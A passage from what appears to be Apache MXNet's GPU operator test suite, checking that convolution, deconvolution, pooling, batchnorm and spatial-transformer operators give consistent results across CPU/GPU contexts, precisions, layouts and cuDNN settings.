fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141")
@with_seed()
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed()
def test_conv_deconv_guards():
# Test cases for convolution and deconvolution via strided fft. Ensure that the framework
# guards against problematic CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING in cuDNN [7.3.1,7.5)
# see https://docs.nvidia.com/deeplearning/sdk/cudnn-release-notes/rel_750.html#rel_750
tol = 1e-1
for (op, opname) in [(mx.sym.Convolution, 'conv'), (mx.sym.Deconvolution, 'deconv')]:
dataname = opname + '_data'
ctx = {'ctx': mx.gpu(0), dataname: (32, 32, 64, 64), 'type_dict': {dataname: np.float32}}
test_cases = [
{'num_filter':32, 'kernel':(6,6), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,6), 'pad':(1,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,7), 'pad':(0,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,6), 'pad':(1,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(1,1), 'stride':(2,2), 'name': opname}]
for test_case_args in test_cases:
try:
sym = op(**test_case_args)
sym_no_cudnn = op(cudnn_off=True, **test_case_args)
check_consistency([sym, sym_no_cudnn], [ctx, ctx], tol=tol)
except:
print('Test failure of mx.sym.{} with args: {}'.format(op.__name__, test_case_args))
raise
def _conv_with_num_streams(seed):
with random_seed(seed):
# Try to expose timing-dependent improper workspace sharing by parallel dgrad and wgrad
num_trials = 20
for _ in range(num_trials):
size = np.random.randint(32, 128)
# The cudnn conv operator runs dgrad and wgrad in separate streams if enabled, with possible
# kernel overlap. The non-cudnn conv op doesn't do this so is used as the 'golden copy'.
ctx = {'ctx': mx.gpu(0), 'conv_data': (2, 2, size, size),
'type_dict': {'conv_data': np.float32}}
# Adding 'flip' here isolates the model from the input node (which can't use inplace store)
flipped = mx.sym.flip(axis=0, name='conv')
sym = mx.sym.Convolution(data=flipped, num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
flipped_no_cudnn = mx.sym.flip(axis=0, name='conv')
sym_no_cudnn = mx.sym.Convolution(data=flipped_no_cudnn, num_filter=3, kernel=(3,3), pad=(1,1),
cudnn_off=True, name='conv')
try:
# tol can be pretty high- we're looking for a large diff due to garbaged workspace
check_consistency([sym, sym_no_cudnn], [ctx, ctx], tol=1e-2)
except:
print('Failing conv size = {}'.format(size))
raise
@with_seed()
def test_convolution_multiple_streams():
for num_streams in [1, 2]:
for engine in ['NaiveEngine', 'ThreadedEngine', 'ThreadedEnginePerDevice']:
print("Starting engine %s with %d streams." % (engine, num_streams), file=sys.stderr)
run_in_spawned_process(_conv_with_num_streams,
{'MXNET_GPU_WORKER_NSTREAMS' : num_streams, 'MXNET_ENGINE_TYPE' : engine})
print("Finished engine %s with %d streams." % (engine, num_streams), file=sys.stderr)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_convolution_large_c():
problematic_c = 64 * 1024
# The convolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_deconvolution_large_c():
problematic_c = 64 * 1024
# The deconvolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
@with_seed()
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# More max-pooling strides and pads to test cudnn pooling implementation code paths
@with_seed()
def test_pooling_nhwc_with_convention():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for in_shape in [(3, 4, 8, 8), (2, 2, 20, 20)]:
for kernel in [(2,2), (3,3), (4,4)]:
for stride in [(1,1), (1,2), (2,1), (2,2)]:
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': in_shape,
'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='valid', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='full', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=(300,300), pool_type='max',
global_pool=True, name='pool')
check_consistency_NxM(symlist, ctx_list)
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
@with_seed()
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=True)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=False)
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_pooling_with_type2():
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare cpu and gpu results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@with_seed()
def test_pooling_nhwc_with_type():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
# NHWC pooling only enabled on GPU with CUDNN
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
@with_seed()
def test_pooling_versions():
# Produce the name of the 'transposed' layout, given the dimension
def transposed_layout(ndim):
if ndim < 3 or ndim > 5:
raise RuntimeError("Invalid data dim, expecting 3, 4 or 5")
return ('NWC', 'NHWC', 'NDHWC')[ndim-3]
# default padding is all zeros
def is_default_pad(pad):
return pad == (0,) * len(pad)
# default stride is all ones
def is_default_stride(stride):
return stride == (1,) * len(stride)
# returns True/False randomly with equal probability
def random_choice():
return np.random.random(1)[0] < 0.5
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
pooling_convention='valid', global_pool=False, p_value=2,
count_include_pad=True, tol=None, dtype=np.float32):
ctx_list = []
sym_list = []
